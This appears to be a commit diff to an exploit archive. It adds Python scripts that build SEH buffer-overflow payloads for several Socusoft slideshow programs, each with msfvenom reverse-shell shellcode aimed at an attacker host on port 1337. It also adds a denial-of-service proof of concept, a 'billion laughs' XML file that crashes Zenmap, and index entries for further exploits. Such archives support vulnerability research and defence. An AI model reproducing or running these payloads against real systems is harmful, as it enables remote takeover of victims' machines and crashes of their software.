print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

63
exploits/windows_x86/local/45352.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://www.dvd-photo-slideshow.com/3gp-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key". Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
buffer = "A" * (512)
# 0x10030b2d : pop ebx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0 (
# C:\Program Files\Socusoft\Socusoft 3GP Photo Slideshow\DVDPhotoData.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x2d\x0b\x03\x10"
nops = "\x90" * 18
#Badchar \x00\x0a\x0d
#sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

69
exploits/windows_x86/local/45353.py Executable file
View file

@ -0,0 +1,69 @@
# Exploit Title: Photo To Video Converter Professional 8.07 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:hhttp://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key".
# Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
buffer = "A" * 502
buffer += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x30"
# 0x10015a62 : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ}
# [DVDPhotoData.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0
# (C:\Program Files\Socusoft\Socusoft Photo To Video Converter Professional\DVDPhotoData.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x62\x5a\x01\x10"
nops = "\x90" * 18
# Badchar \x00\x0a\x0d
# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5
# LPORT=1337 -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

63
exploits/windows_x86/local/45355.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://flash.dvd-photo-slideshow.com/
# Tested Version: 5.20
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Name" + "Code" > Click "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
buffer = "A" * 1328
# 0x1011063f : pop eax # pop esi # ret | ascii {PAGE_EXECUTE_READ}
# [cximage.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.9.c
# (C:\Program Files\Flash Slideshow Maker Professional\cximage.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x3f\x06\x11\x10"
nops = "\x90" * 18
# Badchar \x00\x0a\x0d
# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337 -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
pad ="C" * (2300 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

33
exploits/windows_x86/local/45356.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: Any Sound Recorder 2.93 - Denial of Service (PoC)
# Date: 2018-09-09
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.any-sound-recorder.com
# Software: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: Any Sound Recorder 2.93
# Tested on: Windows 7 SP1 x86
#!/usr/bin/python
import struct
print"""
#1. Download and install the setup file
#2. A file "Byte.txt" will be created
#3. Click Help > Enter key code... in tool bar
#4. Copy the contents of the file (Byte.txt) and paste in the Username Name field
#5. Click Register and BOOMMMM !!!!
totalsize = 7000 # total size buff
buffer= "\x41" * 900 #Offset
nseh= "BBBB" # next seh address
seh= "CCCC" # seh address
shellcode= "T" * (totalsize-len(buffer+nseh+seh))
payload = buffer + nseh + seh + shellcode
try:
f=open("Byte.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

52
exploits/windows_x86/local/45357.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Nmap 7.70 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-10
# Software Link: https://nmap.org/dist/nmap-7.70-setup.exe
# Tested Version: 7.70 (ZenMap)
# Tested on OS: Windows 7 32bit
# Description: This vunerability causes the program to crash and start to heavily consume
# system resources. Do not test on critical systems, can cause system crash.
# Steps to reproduce:
# 1. Create a file in Notepad with the following and save it as "test.xml":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
<!ENTITY lol11 "&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
<!ENTITY lol12 "&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
<!ENTITY lol13 "&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
<!ENTITY lol14 "&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
<!ENTITY lol15 "&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
<!ENTITY lol16 "&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;&lol15;">
<!ENTITY lol17 "&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;&lol16;">
<!ENTITY lol18 "&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;&lol17;">
<!ENTITY lol19 "&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;&lol18;">
<!ENTITY lol20 "&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;&lol19;">
<!ENTITY lol21 "&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;&lol20;">
<!ENTITY lol22 "&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;&lol21;">
<!ENTITY lol23 "&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;&lol22;">
<!ENTITY lol24 "&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;&lol23;">
<!ENTITY lol25 "&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;&lol24;">
<!ENTITY lol26 "&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;&lol25;">
<!ENTITY lol27 "&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;&lol26;">
<!ENTITY lol28 "&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;&lol27;">
<!ENTITY lol29 "&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;&lol28;">
<!ENTITY lol30 "&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;&lol29;">
]>
<lolz>&lol30;</lolz>
# 2. Open Zenmap > Scan > Open Scan > "test.xml"
# 3. Crash

14
files_exploits.csv
View file

@ -9939,6 +9939,15 @@ id,file,description,date,author,type,platform,port
45325,exploits/windows_x86/local/45325.py,"iSmartViewPro 1.5 - 'DDNS' Buffer Overflow",2018-09-04,"Luis Martínez",local,windows_x86,
45346,exploits/windows/local/45346.py,"DVD Photo Slideshow Professional 8.07 - Buffer Overflow (SEH)",2018-09-07,T3jv1l,local,windows,
45349,exploits/windows_x86/local/45349.py,"iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)",2018-09-07,"Gionathan Reale",local,windows_x86,
45350,exploits/windows_x86/local/45350.py,"SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86,
45352,exploits/windows_x86/local/45352.py,"Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86,
45353,exploits/windows_x86/local/45353.py,"Photo To Video Converter Professional 8.07 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86,
45354,exploits/windows/local/45354.txt,"Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection",2018-09-10,hyp3rlinx,local,windows,
45355,exploits/windows_x86/local/45355.py,"Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)",2018-09-10,"Shubham Singh",local,windows_x86,
45356,exploits/windows_x86/local/45356.py,"Any Sound Recorder 2.93 - Denial of Service (PoC)",2018-09-10,T3jv1l,local,windows_x86,
45357,exploits/windows_x86/local/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",local,windows_x86,
45369,exploits/linux/local/45369.rb,"Ghostscript - Failed Restore Command Execution (Metasploit)",2018-09-10,Metasploit,local,linux,
45372,exploits/linux/local/45372.txt,"VirtualBox 5.2.6.r120293 - VM Escape",2018-08-28,"Reno Robert",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16767,6 +16776,7 @@ id,file,description,date,author,type,platform,port
45333,exploits/windows_x86/remote/45333.py,"FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)",2018-09-05,"Luis Martínez",remote,windows_x86,
45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware,
45345,exploits/linux/remote/45345.txt,"Tenable WAS-Scanner 7.4.1708 - Remote Command Execution",2018-09-07,"Sameer Goyal",remote,linux,
45367,exploits/multiple/remote/45367.rb,"Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)",2018-09-10,Metasploit,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39063,7 +39073,7 @@ id,file,description,date,author,type,platform,port
42634,exploits/hardware/webapps/42634.txt,"Huawei HG255s - Directory Traversal",2017-09-07,"Ahmet Mersin",webapps,hardware,
42636,exploits/php/webapps/42636.txt,"Babysitter Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
42637,exploits/php/webapps/42637.txt,"Job Board Software 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
42638,exploits/php/webapps/42638.py,"RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities",2017-08-16,"Alexander Korznikov",webapps,php,
42638,exploits/php/webapps/42638.py,"RPi Cam Control < 6.3.14 - Multiple Vulnerabilities",2017-08-16,"Alexander Korznikov",webapps,php,
42639,exploits/php/webapps/42639.txt,"Just Dial Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
42641,exploits/php/webapps/42641.txt,"Professional Service Booking 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
42642,exploits/php/webapps/42642.txt,"Restaurant Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,
@ -39932,3 +39942,5 @@ id,file,description,date,author,type,platform,port
45344,exploits/php/webapps/45344.txt,"MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection",2018-09-07,"Carlos Avila",webapps,php,80
45347,exploits/php/webapps/45347.txt,"Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal",2018-09-07,"Carlos Avila",webapps,php,
45348,exploits/hardware/webapps/45348.txt,"QNAP Photo Station 5.7.0 - Cross-Site Scripting",2018-09-07,"Mitsuaki Shiraishi",webapps,hardware,
45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware,
45361,exploits/linux/webapps/45361.py,"RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution",2018-09-04,"Reigning Shells",webapps,linux,

Can't render this file because it is too large.